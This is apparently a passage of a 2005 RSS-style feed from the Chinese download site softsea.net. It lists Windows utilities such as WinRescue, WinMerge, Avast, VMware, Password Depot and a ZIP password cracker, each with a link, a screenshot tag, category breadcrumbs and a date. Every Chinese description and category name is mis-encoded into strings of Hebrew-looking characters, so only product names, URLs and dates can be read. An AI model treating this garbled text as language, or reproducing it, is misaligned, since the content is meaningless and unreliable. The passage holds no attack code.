ִד¿ֹׂװװװױג¸צָם¼‏£¬ֻ¿ֹ°ןִדװֶ½±ֲָֿ±¸·Windows NT µִ½ב¹¹ֵהײֳֿא¹״־ִ¼‏ (°ְ¨ autoexec.bat¡¢config.sys¡¢msdos.sys¡¢ Registryµֲַ¼µµ¡¢Sta<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30515.htm">ֿµֽ³±¸·</a>] - -http://www.softsea.net/soft/109020.htm -Thu, 22 Dec 2005 16:00:00 GMT - - -WinRescue 98 5.08.32 -http://www.softsea.net/soft/109018.htm - -<img src="http://www.softsea.net/shot1/109018.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;µ±ִדµִ Windows 98 ²׳קֿµֽ³·¢ֹת־ּג־·¨¿×»ת£¬ֱ¬°²ָ«ִ£½ ׂ²׃׀־ּג±£¬´ף²¿·ײµִָֻ¿ִֹ»בׁ¡װסײ״¹א׳קׂµֿµֽ³ׂ»ֽ¾£¬»ע׀ם ִד¿ֹׂװװװױג¸צָם¼‏£¬ֻ¿ֹ°ןִדװֶ½±ֲָֿ±¸·Windows 95 µִ½ב¹¹ֵהײֳֿא¹״־ִ¼‏ (°ְ¨ autoexec.bat¡¢config.sys¡¢msdos.sys¡¢ Registryµֲַ¼µµ¡¢Start Menu¡¢<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30515.htm">ֿµֽ³±¸·</a>] - -http://www.softsea.net/soft/109018.htm -Thu, 22 Dec 2005 16:00:00 GMT - - -WinRescue 95 (For Win95 Only) 10.08.32 -http://www.softsea.net/soft/109017.htm - -<img src="http://www.softsea.net/shot1/109017.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;µ±ִדµִ Windows 95 ²׳קֿµֽ³·¢ֹת־ּג־·¨¿×»ת£¬ֱ¬°²ָ«ִ£½ ׂ²׃׀־ּג±£¬´ף²¿·ײµִָֻ¿ִֹ»בׁ¡װסײ״¹א׳קׂµֿµֽ³ׂ»ֽ¾£¬»ע׀ם ִד¿ֹׂװװװױג¸צָם¼‏£¬ֻ¿ֹ°ןִדװֶ½±ֲָֿ±¸·Windows 98 µִ½ב¹¹ֵהײֳֿא¹״־ִ¼‏ (°ְ¨ autoexec.bat¡¢config.sys¡¢msdos.sys¡¢ Registryµֲַ¼µµ¡¢Start Menu¡¢<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30515.htm">ֿµֽ³±¸·</a>] - -http://www.softsea.net/soft/109017.htm -Thu, 22 Dec 2005 16:00:00 GMT - - -WinRescue 2000 2.08.32 -http://www.softsea.net/soft/109015.htm - -<img src="http://www.softsea.net/shot1/109015.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;µ±ִדµִ Windows 2000 ²׳קֿµֽ³·¢ֹת־ּג־·¨¿×»ת£¬ֱ¬°²ָ«ִ£½ ׂ²׃׀־ּג±£¬´ף²¿·ײµִָֻ¿ִֹ»בׁ¡װסײ״¹א׳קׂµֿµֽ³ׂ»ֽ¾£¬»ע׀ם ִד¿ֹׂװװװױג¸צָם¼‏£¬ֻ¿ֹ°ןִדװֶ½±ֲָֿ±¸·Windows NT µִ½ב¹¹ֵהײֳֿא¹״־ִ¼‏ (°ְ¨ autoexec.bat¡¢config.sys¡¢msdos.sys¡¢ Registryµֲַ¼µµ¡¢Start Menu<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30515.htm">ֿµֽ³±¸·</a>] - -http://www.softsea.net/soft/109015.htm -Thu, 22 Dec 2005 16:00:00 GMT - - -AccelMan 2.7.3 build 2056 -http://www.softsea.net/soft/107216.htm - -<img src="http://www.softsea.net/shot1/107216.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ָ«׀ֲׂ»´תµִ־ִ¼‏¹ְםֶק£¬¸»׃׀¶אײ״½יֳז׃כ¶א¹¦ִ־ִ¼‏¹ְםֿµֽ³£¬²׳ק·½ֳז£÷ּב¹©ה¯ְְֶק¡¢׳װ´¹ְםֶק¡¢Windows commander¼°ִ¶¨µִה¯ְְִ£½£¬ֻז¹׃ֳױµִֿ²÷ֳ£¬־ֿײֶµִ¶א´°¸ס׃כ¿ֹֻ®ֶ½»ע´¹ײ±ֱֵֵ׀£¬ײ§³ײִ¶¨µִ¿ל½¹¦ִ»ע׳װ´¹ְםֶקµִ¿ל½¹¦ִ±ם¡£־ִ¼‏¹ְם·½ֳז£÷°ְ¨ׂ»°דµִ¸´ײֶ¡¢ֶׂ¶¯µָ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30214.htm">־ִ¼‏¹ְם</a>] - -http://www.softsea.net/soft/107216.htm -Thu, 22 Dec 2005 16:00:00 GMT - - -WinMerge 2.5.0.4 -http://www.softsea.net/soft/107025.htm - -<img src="http://www.softsea.net/shot1/107025.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;µ±ִת׃׀ֱ½¸צׂװֹֿµִִָֿאֶֻµִ־ִ׳ײ־ִ¼‏±£¬WinMerge¾ֽ¿ֹׂװֱ¢¿ֵֹֹּֿ׃ֳ³¡£¬ °ןִת¼ל²יֱ½¸צ־ִ¼‏ְןֽ·²»ֽ¬ײ®´¦¡£ָחִת׃׀׀´¹‎³ּ׀ע¾ֽ»בֱֻ½ג£¬µ±ִתװ¸ִ°ז±£¬ װ׀ֲµִ³ּ׀עֲכ׃כ¾ֹµִ³ּ׀עֲכײ®¼הµ½µ׳׃׀ִִ׀©²»ֽ¬ײ®´¦£¬µִָ·»בֳִָתֹֻׂ»׀©ִװ½מ¡£ »עױִתװר׳«׀´ֱ½·ׂװֹֿµִ־ִ׳ײ־ִ¼‏£¬ִָֹװ׃׀²מׂל£¬µ«<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30208.htm">־ִ±¾±א¼­</a>] - -http://www.softsea.net/soft/107025.htm -Thu, 22 Dec 2005 16:00:00 GMT - - -AutoRun Creator 1.3 -http://www.softsea.net/soft/138502.htm - -<img src="http://www.softsea.net/shot1/138502.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ױג¸צָם¼‏ּב¹©½¨װל׳װ¶¯װֻ׀׀ָם¼‏µִׂ»ײײ·½½£¬ִדװ¼¸¸צ·ײײ׃ׂװִִ¹»½¨װלִדµִ׳װ¼÷µִ CD/DVD ׳װ¶¯װֻ׀׀ָם¼‏¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/308.htm">¿×·¢ײֶ׳ק</a> > <a href="http://www.softsea.net/cat/30801.htm">±א³ּ¹₪¾</a>] - -http://www.softsea.net/soft/138502.htm -Wed, 21 Dec 2005 16:00:00 GMT - - -Registry Help Pro 1.18 -http://www.softsea.net/soft/137859.htm - -<img src="http://www.softsea.net/shot1/137859.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;¹׃ֳWindows²׳קֿµֽ³׳¢²ב±םֹ¨ֳט£¬ַוְם÷ֽ׀¸´׳מ׃ֵ»¯÷ֽ¹ְםִדµִWindows²׳קֿµֽ³׳¢²ב±ם¡£¸ֳָם¼‏»¹°ְ¨ׂ»¸צ׳¢²ב±ם־¢µקֱ׀±ם£¬¸¼¶µִ׳¢²ב±םֻֻׁקׂ‎ַז£¬¸¼¶µִ׳¢²ב±םה¯ְְ÷ֽ±א¼­£¬°´ױױָױֶ÷ֽ±¼הµְִת·±ה¸£¬Windows׳¢²ב±ם±¸·£¬Windows²׳קֿµֽ³׳¢²ב±ם±ָ½ֿ÷ֽ»ײ¸´£¬¸¼¶µִWindows׳¢²ב±ם<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/303.htm">ֿµֽ³װצַ¿</a> > <a href="http://www.softsea.net/cat/30302.htm">׳¢²ב±םַוְם</a>] - -http://www.softsea.net/soft/137859.htm -Wed, 21 Dec 2005 16:00:00 GMT - - -BackupAssist 3.4.1 -http://www.softsea.net/soft/136709.htm - -<img src="http://www.softsea.net/shot1/136709.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ׂ»¿מױכ¶װֶףׂµ»עױֶהֻ׳יײ¯µִ‎¾±¸·¹₪¾£¬ײ§³ײ¼ֶ»®ָ־־ס¹¦ִ£¬¿ֹׂװׁ¡װס÷ֿµִ±¸·½יײָח¹גֵּ£¬ָםֵּ£¬´ֵ´רµָ¡£ײ§³ײֽ¨¹‎email·¢ֻֽ±¸·ָױײ¾÷ֽֽ¨¹‎emailּב׀ֳׁ״י¸»»´ֵ´רµָ¹¦ִ£¬׳מ׀ֲ°ז±¾¸ִֶֹ·‏־ס׀װִ£¬׀ױ‎·‏־ס³¬±±ְְ£µִbug£¬¸÷ֳµִ´¦ְם²»ױ‎ָ·µִָ¨²׳ק¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30515.htm">ֿµֽ³±¸·</a>] - -http://www.softsea.net/soft/136709.htm -Wed, 21 Dec 2005 16:00:00 GMT - - -´°װֻֻׁק¿ֽ»§¶ֻ ֳג·ׁ°ז 1.0 Beta -http://www.softsea.net/soft/133223.htm - -<img src="http://www.softsea.net/shot1/133223.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;׀¡ַֹׂ׳׃ֳ£÷½צ150Kµִ³¬׀¡ּו»‎£¬·ֲֹֻֿװ״£¬¼¸÷ץ²»ױ¼׃²ֵּ¿ױ¼ה¡£½חֳז¼ע½א׀¡ַֹ£¬¿ֹױֻץֽ£¿¿װֱִֶ»ָ־ׂגµ״·½£¬·½±דִתֻז±¹׃ֳ¡£¡¡¡¡÷£ֱ¿ִָ£÷÷ףּ¨ּב¹©198±¾ָ¨ֽ‏´µה£¬450ֽע׃¢÷÷»¥ׂכ´ּץ £¬340ֽע÷÷׃¢»¥ׂכ´ּץ£¬12ֽעָױ÷÷»¥ׂכ´ּץµִַ¿´ףײ§³ײ£¬ֽךָ«µֿײײ׀¡¢׃¢¡¢ָױָ‎׃ן»¥ׂכ¡£<br />¡¡¡¡<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/307.htm">²־¿¼¹₪¾</a> > <a href="http://www.softsea.net/cat/30702.htm">µח׳׃´ַµה</a>] - -http://www.softsea.net/soft/133223.htm -Wed, 21 Dec 2005 16:00:00 GMT - - -Avast 4 Professional Edition 4.6.744 -http://www.softsea.net/soft/110593.htm - -<img src="http://www.softsea.net/shot1/110593.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ױג¾­ ICSA ײ₪µ·ְ²¡¶¾ָם¼‏ֹ¨ֳט²¡¶¾£¬ָה³ז÷ִֽ¾ֲםְ´ֻµ¡£µװצµִׂװ iAVS ¼¼ץ¸׀ֲ־×ְׂ¾µִ¸׀ֲ²¡¶¾¶¨ׂו־ִ¼‏ֳ¿׀ֱֶַ½´־¡£AVAST32 ׃׀ָ«ִ£¿י»¯µִ¼¹¹£¬ֻµִׂ‎ַז÷ֻ׀ִ¿ֹ׃כ׀ם¶אµִ¿ֽ»§¶ֻ³ּ׀ע»ע Plungin ֵה÷ֿ¡£ױגָם¼‏¿ֹׂװױל²ג³צ´ףֱ¿µִ Windows 9X/Me »ע Windows NT/XP/2000 »·¾³ֲֿµִׁׂײ×<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31191.htm">ֶהָֻם¼‏</a>] - -http://www.softsea.net/soft/110593.htm -Wed, 21 Dec 2005 16:00:00 GMT - - -VMware Workstation For Windows 5.5.1 build 19175 -http://www.softsea.net/soft/108410.htm - -<img src="http://www.softsea.net/shot1/108410.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;²»׀טׂ×ײ״¿×»ת¾ִֽװֽ¬ׂ»ּ¨µחִװ¹׃ֳ÷ֳ¼¸¸צOS¡£VMwareײקׂ×µִ¹¦ִ׃׀£÷1.²»׀טׂ×·ײַר»עײ״¿×»ת¾ִֽװֽ¬ׂ»ּ¨PCֹֿ¹׃ֱֳ½ײײׂװֹֿµִ²׳קֿµֽ³¡£2.ֽךָ«¸פְכ²¢ַׂ±£»₪²»ֽ¬OSµִ²׳ק»·¾³ׂװ¼°ֻש׃׀°²׳°װOSֳֹֿזµִ׃¦׃ֳָם¼‏÷ֽ׳ֱֿ¡£3.²»ֽ¬µִOSײ®¼ה»¹ִ»¥¶¯²׳ק£¬°ְ¨ֽרֲח¡¢ײ±¡¢־ִ¼‏·ײֿםׂװ¼°¸´ײֶ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30501.htm">ֿµֽ³ׂ‎µ¼</a>] - -http://www.softsea.net/soft/108410.htm -Wed, 21 Dec 2005 16:00:00 GMT - - -Password Depot 2.60 -http://www.softsea.net/soft/108117.htm - -<img src="http://www.softsea.net/shot1/108117.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ױג־×ִד¹ְםֻש׃׀µִ¿ֱמµִ¹₪¾¡£¹׃ֳײמָח BlowFish ÷ֽ Rijndael µִ°²ָ«ֻד·¨¼׃ֳִדµִ־ִ¼‏£¬ׂ²°ְ¨׳ס״ײ¸¾µִ־ִ¼‏·ֻי±ך׳¼ְֳ¹תµִ DOD £¬װ׀םִדֽךָ«µ״·ֻי±»´´½¨µִ־ִ¼‏¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/304.htm">°²ָ«·ְ»₪</a> > <a href="http://www.softsea.net/cat/30406.htm">ֲֳכ¹ְם</a>] - -http://www.softsea.net/soft/108117.htm -Wed, 21 Dec 2005 16:00:00 GMT - - -EmEditor Pro 5.00 -http://www.softsea.net/soft/106966.htm - -<img src="http://www.softsea.net/shot1/106966.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;EmEditorַ׃ְֳ´±א¼­WindowsֹֿµִHTML¼°ֶהֻ³ּ½µִ־ִי±א¼­ֶק¡£EmEditorֽךָ«ײ§װ®ֽע¹תֲכ(Unicode)÷ֽֽג¹ִׂ£׳י(plug-ins)£¬ֻשׂװִד¿ֹׂװ׃ְֳֻ´±א¼­¶א׃ןׁװµִ־ִױֲ£¬²¢ַׂ¿ֹׂװְ©ױֵֻµִ¹¦ְִ´ֲת׳דִדµִּ״גׂ×ַף¡£ֽ¬±£¬EmEditorַׂ»¸צ׀¡׀ַֽב±ד¿לֻµִ־ִי±א¼­³ּ½.ֻ׃׀׀ם¶אַ¿´ףµִ¹¦ְִ‎ָח׃ֳ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30208.htm">־ִ±¾±א¼­</a>] - -http://www.softsea.net/soft/106966.htm -Wed, 21 Dec 2005 16:00:00 GMT - - -Hotkeycontrol XP 5.2 -http://www.softsea.net/soft/106152.htm - -<img src="http://www.softsea.net/shot1/106152.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ױגַָָ¼¹₪¾£¬װ׀םִדֹטײֳָָ¼׳צִדµִָױ³£²׳ק£¬ֿף´ע¿×־ִ¼‏£¬´ע¿×CD-ROM£¬ײ״ֶפ¼ֶֻד»ת£¬¿״ײֶ»מ¶¯´°¿£¬¿״ײֶ Windows ֳ½ּו²¥·ֵֶק÷ֽ Winamp µָ¡£´ףֱ¿µִ׳´¿צִ¹»װֽ׀ֵּײ׀»עװֱִֶ»ֹֿֿװ¾÷ִֽדִ¹»ׂ²ֿװ¾ָ־÷־װֱִֶ»ֹֿµִ׀ֵֿ¢¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/301.htm">µ׃ֳ¹₪¾</a> > <a href="http://www.softsea.net/cat/30106.htm">ף±ך¼ֵּ</a>] - -http://www.softsea.net/soft/106152.htm -Wed, 21 Dec 2005 16:00:00 GMT - - -Locate32 3.0 Beta 5 (2.99.5.12180) -http://www.softsea.net/soft/136625.htm - -<img src="http://www.softsea.net/shot1/136625.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;Locate¿ֹׂװ½«ִד׃²ֵֹֻּֿש׃׀־ִ¼‏µִ־ִ¼‏ֳ±£´ז½רׂ»¸צ‎¾¿ג£¬»עִַדײ¸¶¨µִָ־ׂג׃²ֵּ÷ִֽ¿ֲ¼£¬ױגׁשװ¹₪׳קײ׀ִד¾ֽ¿ֹׂװ·½±ד¿לֻµִ²יױׂ־ִ¼‏¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30214.htm">־ִ¼‏¹ְם</a>] - -http://www.softsea.net/soft/136625.htm -Tue, 20 Dec 2005 16:00:00 GMT - - -Write CDs 32 & 64 bit 4.32 -http://www.softsea.net/soft/136622.htm - -<img src="http://www.softsea.net/shot1/136622.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;¼ז¾׳¥ׂפ¹ל¹¦ִµִֹױֲ¼ָם¼‏Write CDs£¬ֻ¿ֹׂװֹױֲ¼‎¾¹גֵּ¡¢ׂפְײ¹גֵּ£¬ײ§³ײ TAO (Track-at-Once) ִ£½£¬ײ±½׃½«MP3ֹױֲ¼³ֹׂ»°דµִׂפְײ¹גֵּ(.cda)£¬ִ½¨ׂפְײ¹גֵּ¼°ׂפְײ־ִ¼‏²¥·ֵ¹¦ִ¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/301.htm">µ׃ֳ¹₪¾</a> > <a href="http://www.softsea.net/cat/30110.htm">¿ֲּ¼¹₪¾</a>] - -http://www.softsea.net/soft/136622.htm -Tue, 20 Dec 2005 16:00:00 GMT - - -Process Lasso 2.13 -http://www.softsea.net/soft/134007.htm - -<img src="http://www.softsea.net/shot1/134007.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ׂ»¿מֿµֽ³½ר³ּ־¬»₪¹₪¾£¬¿ֹׂװ¼א׃½ר³ּװֻ׀׀²¢·ְײ¹ֿµֽ³±ְְ£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30514.htm">ֿµֽ³¼א¿״</a>] - -http://www.softsea.net/soft/134007.htm -Tue, 20 Dec 2005 16:00:00 GMT - - -E-ֹס¼׃ֳ־ִ¼‏¼׀ ÷ְ»×°ז Build 051221 -http://www.softsea.net/soft/133272.htm - -<img src="http://www.softsea.net/shot1/133272.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ַׂ»¿מ¹¦ִֽךֶֹ£¬½חֳז÷ְ»×£¬²׳ק¼ע±דµִ־ִ¼‏¼׀¼׃ֳָם¼‏£¬¹׃ֳ±¾ָם¼‏ִת¿ֹׂװַבׂ׳µ״½«ִתµִֻ½ָֻ׳ֱֿµֿײ¼׃ֳ±£´ז£¬¼ע±דµ½ײ»ׂ×װִתֿכׂ×¼׃ֳµִ־ִ¼‏¼׀ֽ¼±ךֹֿ׃ׂ¼µ¥»ק[¼׃ֳ]£¬ָ»÷ףהָכױ‎ָ·µֲֳִכװ°´ׂ»ֲֿ»״³µ¾ֽ¿ֹׂװֱֻ£¡±¾ָם¼‏²ֹ׃ֳ³ֹלµִRSAֻד·¨£¬ֳִָתµֳִ״ֳ¸ֳ״ֳ£¡ ²»½צ¿ֹׂװ½«ִתµִ־ִ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30216.htm">־ִ¼‏¼׃ֳ</a>] - -http://www.softsea.net/soft/133272.htm -Tue, 20 Dec 2005 16:00:00 GMT - - -½נֹ½QQ־²°ֽ׳¨ֹ±¹₪¾ 2005.12.19.15 -http://www.softsea.net/soft/132690.htm - -<img src="http://www.softsea.net/shot1/132690.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;½נֹ½ֶֽ³צµִQQ־²°ֽ²¡¶¾׳¨ֹ±¹₪¾<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31103.htm">½נֹ½¶¾°װ</a>] - -http://www.softsea.net/soft/132690.htm -Tue, 20 Dec 2005 16:00:00 GMT - - -UltraISO Media Edition 7.6.5.1250 -http://www.softsea.net/soft/126090.htm - -<img src="http://www.softsea.net/shot1/126090.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;UltraISOָםµתֽ¨ַׂ»¿מ¹¦ִַ¿´ף¶ר׃ײ·½±דµ׃ֳµִָםµת־ִ¼‏ײֶ׳ק/±א¼­/׳×»»¹₪¾£¬ֻ¿ֹׂװײ±½׃±א¼­ָםµת־ִ¼‏÷ֽ´׃ָםµתײ׀ּבָ¡־ִ¼‏£¬ׂ²¿ֹׂװ´׃CD-ROMײ±½׃ײֶ׳קָםµת»עױ½«׃²ֵֹּֿµִ־ִ¼‏ײֶ׳ק³ֹISO־ִ¼‏¡£ֽ¬±£¬ִדׂ²¿ֹׂװ´¦ְםISO־ִ¼‏µִֶפ¶¯׀ֵֿ¢£¬´׃¶רײֶ׳ק¿ֹׂ‎µ¼¹גֵּ¡£¹׃ֳUltraISO£¬ִד¿ֹׂװֻז׀ִֻש<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/301.htm">µ׃ֳ¹₪¾</a> > <a href="http://www.softsea.net/cat/30110.htm">¿ֲּ¼¹₪¾</a>] - -http://www.softsea.net/soft/126090.htm -Tue, 20 Dec 2005 16:00:00 GMT - - -Super Flexible File Synchronizer 2.62 Beta1 Build 436 -http://www.softsea.net/soft/121975.htm - -<img src="http://www.softsea.net/shot1/121975.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ױג¸צָם¼‏װ׀םִד¸׀ֲִדµִ±ד׀¯½¼ֶֻד»ת÷ֽ¸צָֻ¼ֶֻד»ת£¬»עױ±¸·´ז´¢ֶקֻשװ¡£ִדִ¹»װ¶אµִ¼ע½יײ׀´¢´זִדµִֹטײֳ¡£ָם¼‏·¢ֿײ±»ֶׂ¶¯µִ־ִ¼‏÷ֽ±םֽׁ¬ׁשµֲִ¼ּ׀רַ°½ר¾µ׳׃¡£‎¾¿ג±£ֿױֿה÷ֽ־×׳װ¶¯µִ±¸·ֻזֽ¬µק¶ָ±ם¶רְ´¡£´ֻֽג£¬ִ¹»¼ֲַ¼ֻש׃׀׳×ֶׂ¡£°ְ¨±»ֽך³ֹµִ½»ׂ׳µִ¿ֹׁ¡µִµח׳׃׃¼‏ֽ¨ײס£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30204.htm">±ָ½ֽֿ¬²½</a>] - -http://www.softsea.net/soft/121975.htm -Tue, 20 Dec 2005 16:00:00 GMT - - -׳ד²´ף׃®¼ׂ 7.06 -http://www.softsea.net/soft/109897.htm - -<img src="http://www.softsea.net/shot1/109897.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;׳דַע²ֶ±·ײ־צָם¼‏£¬²ֳס׳ׁ¡¸´½ֻץֻ®¹‎ֲֻ׳דַע²ֶ±ָם¼‏£¬ײ§³ײְ½ח±­¡¢ֵ·ײ־ו´ףֱ×ָ¡¢±­ָµָ׳דַע²ֶ±¾÷²ֲ£¬ּב¹©¶אײײ׳ד²ָם¼‏ֲֿװ״װ׃ֳ¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/309.htm">¼ֽׂ¥׀ֿ׀</a> > <a href="http://www.softsea.net/cat/30912.htm">²ֶ±ײ׀½±</a>] - -http://www.softsea.net/soft/109897.htm -Tue, 20 Dec 2005 16:00:00 GMT - - -Ultimate ZIP Cracker 7.3.1.6 -http://www.softsea.net/soft/108189.htm - -<img src="http://www.softsea.net/shot1/108189.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ַׂ»¸צ׳¨ֳֵ׃ְֳ´»ײ¸´¼׃ֱֲֳֻכµִ ZIP ׁ¹ֻץ־ִ¼‏µִָם¼‏¡£¹׃ֳַ¿´ףµִֻׁד·¨½«¸קײײ¿ֲֳִַֹכµִ‎׳ײ¡¢·÷ֵ¡¢׳ײִ¸׳י÷ֿ³ֹ׳ײ´®ְׂ׀עהָכ ZIP ׁ¹ֻץ־ִ¼‏µִ·½½װ׳ֵױׂµ½ױ‎ָ·µֲֳִכ¡£ֱםֽג£¬ׂ²ּב¹©¶אײײױׁׂ¯ִ£½¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/304.htm">°²ָ«·ְ»₪</a> > <a href="http://www.softsea.net/cat/30407.htm">ֲֳכ»ײ¸´</a>] - -http://www.softsea.net/soft/108189.htm -Tue, 20 Dec 2005 16:00:00 GMT - - -Advanced Encryption Package 2006 Professional 4.2.4 -http://www.softsea.net/soft/107399.htm - -<img src="http://www.softsea.net/shot1/107399.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ׂ»¸צ¸¼¶µִµֲֳִכֽג¿ַ³ּ׀ע£¬ײֶ׳ק³צְ´µִ־ִ¼‏²»׀טׂ×AEP±ד¿ֹײ´׀׀¡£²ֹ׀׀¾׃ֳ¼¶±אֲכ±ך׳¼£¬ײ§³ײׂװ448bit±אֲכµִ Blowfish÷ֽ128bit±אֲכµִDES.³ּ׀ע»¹ײ§³ײֳז°ז¸»»¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30216.htm">־ִ¼‏¼׃ֳ</a>] - -http://www.softsea.net/soft/107399.htm -Tue, 20 Dec 2005 16:00:00 GMT - - -EaseBackup 5.27 -http://www.softsea.net/soft/106521.htm - -<img src="http://www.softsea.net/shot1/106521.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;־ִ¼‏±¸·¹₪¾£¬ײ§³ײ ZIP ׁ¹ֻץ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30201.htm">־ִ¼‏±¸·</a>] - -http://www.softsea.net/soft/106521.htm -Tue, 20 Dec 2005 16:00:00 GMT - - -TurboBackup 5.0 -http://www.softsea.net/soft/106483.htm - -<img src="http://www.softsea.net/shot1/106483.gif" align="right" alt="Screenshot" hspace="10" 